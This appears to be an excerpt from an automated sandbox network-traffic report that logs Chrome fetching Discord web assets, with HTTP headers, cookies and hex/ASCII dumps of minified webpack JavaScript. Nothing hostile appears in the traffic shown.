                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "5822280717dd3cceefe1400d876d4a4a"
                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 21 Nov 2024 16:26:17 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QjeXRiDpMYk50P73ISqnnDvAe%2Ffj8dBlG%2FNeN0qz0HnKDSMATAwlG2SPG%2F9eokhjBx%2BZ8VGXjAAFtw6jMZnKS7Uy44dH3LwdMYi4r5U9TLgxVdoPEScHxtI%2Fo1Y%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC238INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 30 37 31 22 5d 2c 7b 31 32 36 34 33 36 3a 66 75 6e 63 74 69 6f 6e 28 70 2c 73 2c 61 29 7b 61 2e 72 28 73 29 2c 73 2e 64 65 66 61 75 6c 74 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 63 67 64 41 73 37 22 3a 22 28 57 69 6c 6c 20 6f 70 65 6e 20 69 6e 20 61 20 6e 65 77 20 74 61 62 29 22 7d 27 29 7d 7d 5d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 30 39 61 36 66 31 31 32 66 63 62 63 31 37 66 36 63 66 64 34 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["4071"],{126436:function(p,s,a){a.r(s),s.default=JSON.parse('{"cgdAs7":"(Will open in a new tab)"}')}}]);//# sourceMappingURL=09a6f112fcbc17f6cfd4.js.map


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    66192.168.2.549790162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC830OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC797INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:42 GMT
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    location: /cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js?
                                                                                                                                                                                                                                                                                    cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=19ZZh9GXhLEwbFn%2BupKEKwiYgzrwV8indFtkBz4eu9ZBVDwGqnttdKxbxVq%2FrH1mHjzTXCE1FpJhMAvES%2B3EfiJHtdQyO540qMI57Af0gWEAaNOhhTyWUsi2ue3%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8e73d0ce9cdd420a-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    67192.168.2.549793162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC673OUTGET /assets/5067a2ec1b24a6de868c.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC967INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:42 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 13374
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0ce9b8d0cc8-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "d0c788b157ff96a2dd902c97bfc889f6"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 28 Jun 2024 00:43:12 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5eHjv0bfwUczd6d9VIOBBA8yTwYrfq8a3HcmgyR409Ece1Zd%2FKBLOBn4SowxpRYjeUK7ffEmpX%2FnNuKC0JhLnPC0Ew64Edec1XEkCvLkZSXeJtjkK9gBYVk6WTZu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC402INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 38 31 38 37 22 5d 2c 7b 35 32 36 39 38 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 33 35 34 38 34 38 29 2c 6f 3d 72 28 39 33 38 35 30 37 29 2c 69 3d 54 79 70 65 45 72 72 6f 72 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 65 28 74 29 29 72 65 74 75 72 6e 20 74 3b 74 68 72 6f 77 20 69 28 6f 28 74 29 2b 22 20 69 73 20 6e 6f 74 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 7d 2c 32 34 30 33 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["78187"],{526988:function(t,n,r){var e=r(354848),o=r(938507),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a function")}},24033:function(t,n,r){
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 32 33 29 2c 6f 3d 72 28 39 38 30 38 35 35 29 2c 69 3d 72 28 34 39 36 39 33 29 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 2c 75 29 7b 76 61 72 20 63 2c 66 3d 65 28 6e 29 2c 61 3d 69 28 66 29 2c 73 3d 6f 28 75 2c 61 29 3b 69 66 28 74 26 26 72 21 3d 72 29 7b 66 6f 72 28 3b 61 3e 73 3b 29 69 66 28 28 63 3d 66 5b 73 2b 2b 5d 29 21 3d 63 29 72 65 74 75 72 6e 21 30 7d 65 6c 73 65 20 66 6f 72 28 3b 61 3e 73 3b 73 2b 2b 29 69 66 28 28 74 7c 7c 73 20 69 6e 20 66 29 26 26 66 5b 73 5d 3d 3d 3d 72 29 72 65 74 75 72 6e 20 74 7c 7c 73 7c 7c 30 3b 72 65 74 75 72 6e 21 74 26 26 2d 31 7d 7d 3b 74 2e 65 78 70 6f 72 74 73 3d 7b 69 6e 63 6c 75 64 65 73 3a 75 28 21 30 29 2c 69 6e 64 65 78 4f 66 3a 75 28 21 31 29 7d 7d
                                                                                                                                                                                                                                                                                    Data Ascii: 23),o=r(980855),i=r(49693),u=function(t){return function(n,r,u){var c,f=e(n),a=i(f),s=o(u,a);if(t&&r!=r){for(;a>s;)if((c=f[s++])!=c)return!0}else for(;a>s;s++)if((t||s in f)&&f[s]===r)return t||s||0;return!t&&-1}};t.exports={includes:u(!0),indexOf:u(!1)}}
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 20 65 3d 72 28 31 36 31 35 38 31 29 2c 6f 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 74 72 79 7b 6f 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 7d 63 61 74 63 68 28 72 29 7b 65 5b 74 5d 3d 6e 7d 72 65 74 75 72 6e 20 6e 7d 7d 2c 33 32 35 30 30 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 39 33 36 39 34 30 29 3b 74 2e 65 78 70 6f 72 74 73 3d 21 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 37 21 3d 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 7b 7d 2c 31 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72
                                                                                                                                                                                                                                                                                    Data Ascii: e=r(161581),o=Object.defineProperty;t.exports=function(t,n){try{o(e,t,{value:n,configurable:!0,writable:!0})}catch(r){e[t]=n}return n}},325008:function(t,n,r){var e=r(936940);t.exports=!e(function(){return 7!==Object.defineProperty({},1,{get:function(){r
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 64 20 30 21 3d 3d 70 29 7b 69 66 28 74 79 70 65 6f 66 20 6c 3d 3d 74 79 70 65 6f 66 20 70 29 63 6f 6e 74 69 6e 75 65 3b 66 28 6c 2c 70 29 7d 28 74 2e 73 68 61 6d 7c 7c 70 26 26 70 2e 73 68 61 6d 29 26 26 69 28 6c 2c 22 73 68 61 6d 22 2c 21 30 29 2c 75 28 72 2c 73 2c 6c 2c 74 29 7d 7d 7d 2c 39 33 36 39 34 30 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 72 65 74 75 72 6e 21 21 74 28 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 30 7d 7d 7d 2c 39 36 32 35 35 37 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 39 33 36 39 34 30 29 3b 74 2e 65 78 70 6f 72 74 73 3d 21 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 28 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                                                    Data Ascii: d 0!==p){if(typeof l==typeof p)continue;f(l,p)}(t.sham||p&&p.sham)&&i(l,"sham",!0),u(r,s,l,t)}}},936940:function(t){t.exports=function(t){try{return!!t()}catch(t){return!0}}},962557:function(t,n,r){var e=r(936940);t.exports=!e(function(){var t=(function()
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 7c 7c 46 75 6e 63 74 69 6f 6e 28 22 72 65 74 75 72 6e 20 74 68 69 73 22 29 28 29 7d 2c 37 34 30 33 36 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 35 38 31 30 33 31 29 2c 6f 3d 72 28 33 33 39 37 31 38 29 2c 69 3d 65 28 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 29 3b 74 2e 65 78 70 6f 72 74 73 3d 4f 62 6a 65 63 74 2e 68 61 73 4f 77 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 69 28 6f 28 74 29 2c 6e 29 7d 7d 2c 36 32 34 39 30 36 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 65 78 70 6f 72 74 73 3d 7b 7d 7d 2c 33 34 39 32 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 33 32 35 30 30 38 29 2c 6f 3d 72 28 39 33 36 39 34 30 29 2c 69 3d 72 28 37 32 32 30 36 33 29
                                                                                                                                                                                                                                                                                    Data Ascii: ||Function("return this")()},740362:function(t,n,r){var e=r(581031),o=r(339718),i=e({}.hasOwnProperty);t.exports=Object.hasOwn||function(t,n){return i(o(t),n)}},624906:function(t){t.exports={}},34924:function(t,n,r){var e=r(325008),o=r(936940),i=r(722063)
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 6f 28 74 29 3a 65 28 74 2c 7b 7d 29 7d 2c 67 65 74 74 65 72 46 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3b 69 66 28 21 66 28 6e 29 7c 7c 28 72 3d 6f 28 6e 29 29 2e 74 79 70 65 21 3d 3d 74 29 74 68 72 6f 77 20 79 28 22 49 6e 63 6f 6d 70 61 74 69 62 6c 65 20 72 65 63 65 69 76 65 72 2c 20 22 2b 74 2b 22 20 72 65 71 75 69 72 65 64 22 29 3b 72 65 74 75 72 6e 20 72 7d 7d 7d 7d 2c 33 35 34 38 34 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 31 37 34 31 32 34 29 2c 6f 3d 65 2e 61 6c 6c 3b 74 2e 65 78 70 6f 72 74 73 3d 65 2e 49 53 5f 48 54 4d 4c 44 44 41 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65
                                                                                                                                                                                                                                                                                    Data Ascii: o(t):e(t,{})},getterFor:function(t){return function(n){var r;if(!f(n)||(r=o(n)).type!==t)throw y("Incompatible receiver, "+t+" required");return r}}}},354848:function(t,n,r){var e=r(174124),o=e.all;t.exports=e.IS_HTMLDDA?function(t){return"function"==type
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 6f 69 6e 29 2c 6d 3d 63 26 26 21 6f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 38 21 3d 3d 62 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 22 6c 65 6e 67 74 68 22 2c 7b 76 61 6c 75 65 3a 38 7d 29 2e 6c 65 6e 67 74 68 7d 29 2c 78 3d 53 74 72 69 6e 67 28 53 74 72 69 6e 67 29 2e 73 70 6c 69 74 28 22 53 74 72 69 6e 67 22 29 2c 64 3d 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 22 53 79 6d 62 6f 6c 28 22 3d 3d 3d 79 28 76 28 6e 29 2c 30 2c 37 29 26 26 28 6e 3d 22 5b 22 2b 67 28 76 28 6e 29 2c 2f 5e 53 79 6d 62 6f 6c 5c 28 28 5b 5e 29 5d 2a 29 5c 29 2f 2c 22 24 31 22 29 2b 22 5d 22 29 2c 72 26 26 72 2e 67 65 74 74 65 72 26 26 28 6e 3d 22 67 65 74 20 22 2b 6e 29 2c 72 26 26 72 2e 73 65 74 74 65 72 26 26 28 6e 3d 22 73
                                                                                                                                                                                                                                                                                    Data Ascii: oin),m=c&&!o(function(){return 8!==b(function(){},"length",{value:8}).length}),x=String(String).split("String"),d=t.exports=function(t,n,r){"Symbol("===y(v(n),0,7)&&(n="["+g(v(n),/^Symbol\(([^)]*)\)/,"$1")+"]"),r&&r.getter&&(n="get "+n),r&&r.setter&&(n="s
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 6f 74 20 73 75 70 70 6f 72 74 65 64 22 29 3b 72 65 74 75 72 6e 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 74 5b 6e 5d 3d 72 2e 76 61 6c 75 65 29 2c 74 7d 7d 2c 33 34 37 37 32 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 33 32 35 30 30 38 29 2c 6f 3d 72 28 39 32 36 35 31 35 29 2c 69 3d 72 28 36 31 30 30 36 37 29 2c 75 3d 72 28 38 37 39 29 2c 63 3d 72 28 32 39 39 36 32 33 29 2c 66 3d 72 28 39 36 36 36 30 36 29 2c 61 3d 72 28 37 34 30 33 36 32 29 2c 73 3d 72 28 33 34 39 32 34 29 2c 70 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 3b 6e 2e 66 3d 65 3f 70 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 69 66 28 74 3d 63 28 74 29 2c 6e 3d 66 28 6e 29 2c 73 29 74 72 79 7b 72 65 74 75
                                                                                                                                                                                                                                                                                    Data Ascii: ot supported");return"value"in r&&(t[n]=r.value),t}},347722:function(t,n,r){var e=r(325008),o=r(926515),i=r(610067),u=r(879),c=r(299623),f=r(966606),a=r(740362),s=r(34924),p=Object.getOwnPropertyDescriptor;n.f=e?p:function(t,n){if(t=c(t),n=f(n),s)try{retu
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 34 30 33 33 29 2c 66 3d 6f 28 5b 5d 2e 63 6f 6e 63 61 74 29 3b 74 2e 65 78 70 6f 72 74 73 3d 65 28 22 52 65 66 6c 65 63 74 22 2c 22 6f 77 6e 4b 65 79 73 22 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 69 2e 66 28 63 28 74 29 29 2c 72 3d 75 2e 66 3b 72 65 74 75 72 6e 20 72 3f 66 28 6e 2c 72 28 74 29 29 3a 6e 7d 7d 2c 36 37 36 31 32 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 33 35 31 37 39 29 2c 6f 3d 54 79 70 65 45 72 72 6f 72 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 65 28 74 29 29 74 68 72 6f 77 20 6f 28 22 43 61 6e 27 74 20 63 61 6c 6c 20 6d 65 74 68 6f 64 20 6f 6e 20 22 2b 74 29 3b 72 65 74 75 72 6e 20 74 7d 7d 2c 38 38 33 35 33 39 3a 66 75 6e 63 74 69 6f 6e 28 74
                                                                                                                                                                                                                                                                                    Data Ascii: 4033),f=o([].concat);t.exports=e("Reflect","ownKeys")||function(t){var n=i.f(c(t)),r=u.f;return r?f(n,r(t)):n}},676125:function(t,n,r){var e=r(35179),o=TypeError;t.exports=function(t){if(e(t))throw o("Can't call method on "+t);return t}},883539:function(t
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 65 3d 72 28 39 35 39 33 31 38 29 2c 6f 3d 4d 61 74 68 2e 6d 69 6e 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3e 30 3f 6f 28 65 28 74 29 2c 39 30 30 37 31 39 39 32 35 34 37 34 30 39 39 31 29 3a 30 7d 7d 2c 33 33 39 37 31 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 36 37 36 31 32 35 29 2c 6f 3d 4f 62 6a 65 63 74 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6f 28 65 28 74 29 29 7d 7d 2c 36 39 31 35 35 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 39 32 36 35 31 35 29 2c 6f 3d 72 28 36 32 32 32 38 31 29 2c 69 3d 72 28 33 32 33 39 37 39 29 2c 75 3d 72 28 39 39 35 37 33 39 29 2c 63 3d 72 28 33 33 37 38
                                                                                                                                                                                                                                                                                    Data Ascii: e=r(959318),o=Math.min;t.exports=function(t){return t>0?o(e(t),9007199254740991):0}},339718:function(t,n,r){var e=r(676125),o=Object;t.exports=function(t){return o(e(t))}},691558:function(t,n,r){var e=r(926515),o=r(622281),i=r(323979),u=r(995739),c=r(3378


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    68192.168.2.549792162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC673OUTGET /assets/8143f89919f42e84b455.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC960INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:42 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 30717
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0ceb95a42db-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "a318da370f7ee99d24ca9bbce1926baa"
                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 23 Nov 2024 00:20:14 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HzFmuWEzygtl2DpyljF5Nz5cbQ3OOMLmADZ0BI5iUm5EDnRb6uKXgEtVr7GsGLG4ax%2Frsy0T%2BxfzqKT2Zldu3koFFj4iloK5rV4huO0G9oUQGOPn5ooHzuB3UT4D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
